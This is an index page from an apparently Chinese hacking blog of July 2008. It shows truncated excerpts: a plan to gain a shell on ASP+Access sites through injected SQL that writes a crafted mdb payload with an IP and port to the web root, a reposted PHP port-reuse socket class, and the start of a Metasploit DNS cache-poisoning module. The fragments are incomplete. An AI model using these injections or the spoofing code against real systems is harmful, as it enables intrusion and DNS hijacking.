| 中文版 | English |
|
|
|
|
2008-07-29, 1:44 PM
asp+access的guest权限获取
(此想法暂时未做实验)
对于没有fso没有上传功能的站点是不是有注入也没法通过注入搞定呢.呵呵看了些东西,有个新想法, 而且这个站的路径都爆不出来,很郁闷的. 我们一样可以拿他 1.update tablename set field ="xxx" where id=1; /*这里xxx很重要,是构造的mdb溢出内容包括ip,端口等*/ 2.SELECT * into [test.txt] in 'x:\wwwroot\' 'text;' from tablename where id =1; 3. and (Select Count(*) from [x:\ |
|
2008-07-29, 12:54 PM
php socket利用[转]
windows2003默认已经不准重复绑定端口了
这个东西和以前的《PHP下实现端口复用/劫持》是完全不一样的,那个文章可以在这里找到:http://www.west999.com/info/html/wangluobiancheng/Phpbiancheng/20080224/22439.html <?php class select { var $sockets;// 构造函数 function select($sockets) { $this->sockets = array();foreach($sockets as $socket) { $this->add($socket); } }function add($add_socket) { //array_ |
|
2008-07-29, 9:28 AM
dns缓存利用代码[转]
利用代码:
来自http://metasploit.com/dev/trac/browser/framework3/trunk/modules/auxiliary/spoof/dns/baliwicked_host.rb?rev=5579 1 require 'msf/core' 2 require 'net/dns' 3 require 'scruby' 4 require 'resolv' 5 6 module Msf 7 8 class Auxiliary::Spoof::Dns::BaliWickedHost < Msf::Auxiliary 9 10 &nbs |
|
2008-07-28, 5:21 PM
|
|
2008-07-24, 10:44 AM
今天突然发现baidu的登陆改成ssl加密的了
太让我激动了,我这里要上网就必须要被监控,代理vpn什么的一有流量就给你停掉,而且我的好多密码都被管理员给嗅过去了,也看过登陆记录.的确也是如此,鄙视一下!现在我迫切需要的就是https,非改类站点能不上则不上.当然这样也不能完全保证安全.日了,越来越不敢上网了.
|